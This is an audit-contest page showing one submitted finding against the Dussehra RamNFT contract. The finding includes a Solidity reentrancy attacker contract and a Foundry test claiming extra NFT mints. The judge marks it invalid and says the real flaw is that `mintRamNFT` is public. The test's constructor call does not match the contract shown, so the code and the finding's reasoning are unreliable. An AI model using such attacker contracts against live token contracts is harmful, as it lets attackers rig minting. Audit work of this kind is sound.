First Flight #17: Dussehra

First Flight #17

Beginner FriendlyFoundryNFT

100 EXP

View results

Previous Next

Submission Details

Severity: low

Invalid

`RamNFT::mintRamNFT` is reentrance prone, allowing additional NFT minting by malicious contracts.

4lifemen

Summary

The mintRamNFT function in the RamNFT contract is vulnerable to a reentrancy attack. This allows malicious contracts to mint additional Ram NFTs, thus increasing their chances of being selected as Ram and undermining the contract's fairness.

Vulnerability Details

Proof of Concept

Reentrancy attacker contract:

```
contract Attacker is IERC721Receiver {
    RamNFT ramNFT;

    constructor(RamNFT _ramNFT) {
        ramNFT =  _ramNFT;
    }

    // Implement the IERC721Receiver interface to accept ERC721 tokens
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external override returns (bytes4) {
        // Number limited to 5 to prevent infinite loop
        if(ramNFT.tokenCounter() < 5) {
           // Reentrance to mint additional NFT
            ramNFT.mintRamNFT(address(this));
        }
        return this.onERC721Received.selector;
    }
}
```

Reentrancy test:

```
function test_canMintExtraNft() public {
    // Deploy the attacker contract
    attacker = new Attacker(dussehra, ramNFT);
    vm.deal(address(attacker), 1 ether); // Fund the attacker contract with ether

    // Attacker enters contest
    vm.prank(address(attacker));
    dussehra.enterPeopleWhoLikeRam{value: 1 ether}();

    // Attacker is able to mint additional NFT.
    assertEq(ramNFT.getCharacteristics(0).ram, address(attacker));
    assertEq(ramNFT.getCharacteristics(1).ram, address(attacker));
    assertEq(ramNFT.getCharacteristics(2).ram, address(attacker));
    assertEq(ramNFT.getCharacteristics(3).ram, address(attacker));
}

```

Impact

An attacker can mint extra Ram NFTs, increasing their chances of being selected as Ram, and thereby manipulating the contract’s intended fairness.

Tools Used

Manual review, foundry

Recommendations

1. Use the `nonReentrant` modifier from Openzeppelin

contract RamNFT is ERC721URIStorage, ReentrancyGuard {

...

function mintRamNFT(address to) public nonReentrant {

...

}

Updates

Lead Judging Commences

bube Lead Judge about 1 year ago

Submission Judgement Published

Invalidated

Reason: Non-acceptable severity

Assigned finding tags:

Invalid - reentrancy in safeMint

The problem is that the `mintRamNFT` function is public and anyone can call it, not that the function uses `_safeMint`.

Rewards breakdown

nSLOC

218

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.